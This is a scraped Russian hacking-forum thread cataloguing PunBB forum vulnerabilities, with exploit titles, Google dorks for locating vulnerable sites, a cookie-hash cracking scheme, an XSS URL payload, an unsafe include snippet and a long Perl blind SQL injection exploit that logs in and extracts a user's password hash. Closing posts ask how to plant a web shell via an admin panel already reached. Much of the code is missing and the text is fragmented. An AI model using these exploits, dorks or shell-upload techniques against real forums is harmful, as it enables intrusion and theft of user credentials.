![]() |
[Обзор уязвимостей PunBB]
PunBB <= 1.2.14 Remote Code Execution Exploit
PunBB version <= 1.2.2 Authentication Bypass Exploit ShAnKaR: multiple PHP application poison NULL byte vulnerability PunBB 1.2.4 (change_email) SQL Injection Exploit 1.2.11 PHP код:
PHP код:
<= 1.2.16 PHP код:
PHP код:
PHP код:
Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5 PHP код:
Код:
#!/usr/bin/pythonPHP код:
-punbb_users --id --group_id --username --password Dork example: intext:"Powered by PunBB 1.2.5" intext:"Powered by PunBB" -"1.2.6" -"1.2.7" intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7" intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic" intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog |
Криптографическая атака
Алгоритм шифрования в куках:
PHP код:
md5($cookie_seed.md5("123"))="beae53ed5f767f344b03 646a1aa5b16e" В состав строгого значения входят символы из ряда "abcdef1234567890". Схема генерации куков: PHP код:
$cookie_seed - соль ("идентична" для всех пользователей). Дефолтное значение алгоритма для $cookie_seed(config.php): PHP код:
"Набор символов" для пользовательской маски: ?1: abcdef1234567890 Маска: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70 Значение длины: 40-40 === UPDATE: PasswordPro теперь имеет соответствующий модуль |
PunBB <= 1.2.16 Blind Password Recovery Exploit
PunBB <= 1.2.16 Blind Password Recovery Exploit
http://www.milw0rm.com/exploits/5165 Код:
<?php |
PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload
PHP код:
|
PunBB Migration Tool 1.4.0
PunBB Migration Tool 1.4.0 Download URL: Код:
http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tarBug In: Код:
converters/index.phpКод:
<?php // Load a specific page else{ if(file_exists($_GET['page'] . '.php')) include $_GET['page'] . '.php'; else include 'settings.php'; ?> |
PunBB 1.2.17 Sql injection & File reader
Код:
v1.2.17 punbb.ru rev87 By @Fatal@ aka Doom123 PHP код:
|
XSS PunBB 1.3RC
XSS в самой последней версии 1.3RC
Код:
http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1 |
Multy vuln PunBB <= 1.2.19
PunBB версии до 1.2.19
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и обойти некоторые ограничения безопасности. 1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии include/parser.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. 2. Уязвимость существует из-за неизвестной ошибки, которая позволяет удаленному пользователю внедрить произвольные SMTP команды. |
видео
|
PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
http://www.milw0rm.com/exploits/7159
PHP код:
|
PHP код:
|
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit Код:
#!/usr/bin/perl |
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit Код:
#!/usr/bin/perl |
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
Код:
f (isset($_GET['secure_str']))Код:
#!/usr/bin/php |
Цитата:
================================================== =============== PunBB 526 # function pun_pm_edit_message() # { # global $forum_db, $forum_user, $lang_pun_pm; # # $errors = array(); # # // Verify input data # $query = array( # 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body', # 'FROM' => 'pun_pm_messages m', # 'JOINS' => array( # array( # 'LEFT JO IN' => 'users AS u', # 'ON' => '(u.id = m.receiver_id)' # ), # ), # 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0' # ); # # ($hook = get_hook('pun_pm_fn_ed it_message_pre_validate_query')) ? eval($hook) : null; # # $result = $forum_db->query_build($query) or error(__FILE__, __LINE_ _); # ---- # GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1' # Error - PunBB # An error was encountered # The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php # Database reported: Errore di sintassi nell a query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Er rno: 1064). usestrict; usewarnings; useLWP::UserAgent; useHTTP::Cookies; useHTTP::Request::Common; useTime::HiRes; useIO::Socket; my($UserName,$PassWord,$ID) = @ARGV; if (@ARGVnew(GET=>$Host); my $Cookies= newHTTP::Cookies; my $HTTP= newLWP::UserAgent( agent=>'Mozilla/5.0', max_redirect=>0, cookie_jar=>$Cookies, ) or die $!; my $Referrer="http://www.warwolfz.org/"; my $DefaultTime=request($Referrer); sub request{ $Referrer=$_[0]; $Method->referrer($Referrer); $Start=Time::HiRes::time(); $Response=$HTTP->request($Method); $Response->is_success() or die"$Host: ",$Response->message,"\n"; $End=Time::HiRes::time(); $Time=$End-$Start; return$Time; } sub Blind_SQL_Jnjection{ my($dec,$hex) = @_; return"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--"; } sub Clear() { my $launch= $^O eq'MSWin32'?'cls':'clear'; returnsystem($launch); } sub Login() { if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) { $Cookies->proxy(['http','ftp'],'http://'.$ARGV[4]) or die $!; } my $Get=$HTTP->get($Host.'login.php'); my $csrf_token=""; if ($Get->content=~ /type="hidden"name="csrf_token"value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input $csrf_token= $1; } my$Login=$HTTP->post($Host.'login.php', [ form_sent => '1', redirect_u rl =>$Host.'login.php', csrf_token =>$csrf_token, req_userna me =>$UserName, req_passwo rd =>$PassWord, save_pass => '1', login => 'Login', ]) || die $!; if ($Login->content=~ /Verrai trasferito automaticamente ad una nuov a pagina in 1 secondo/i) { #English Language: You should automatic ally be forwarded to a new page in 1 seco nd. return 1; } else { return 0; } } sub usage { Clear(); { print "\n[0-Day]PunBB F $Time_Start= time(); my$Get1=$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); $Time_End= time(); $Time= request($Referrer); refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I); if ($Time_End-$Time_Start> 6) { $Time= request($Referrer); refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I); if ($Time_End-$Time_Start> 6) { syswrite(S TDOUT,chr($chars[$J])); $Hash.= chr($chars[$J]); $Time= request($Referrer); refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I); last; } } } if ($I== 1 && length$Hash[COLOR="#DD0000"] |
Код:
# Exploit Title: Punbb 1.3.4 Full Path DisclosureУязвимые файлы: Код:
/search.php /userlist.php moderate.phpКод:
http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search |
Подскажите, как зашеллить через админку (доступ в админку форму есть)
|
Как узнать версию вообще можно?
|
Цитата:
Я вот вошел, не пойму чё дальше делать, как шел залить. |
Люди, подскажите сплоиты\баги PunBB 1.3
Или же следующих плагинов (папка extensions) Цитата:
|
| Время: 14:43 |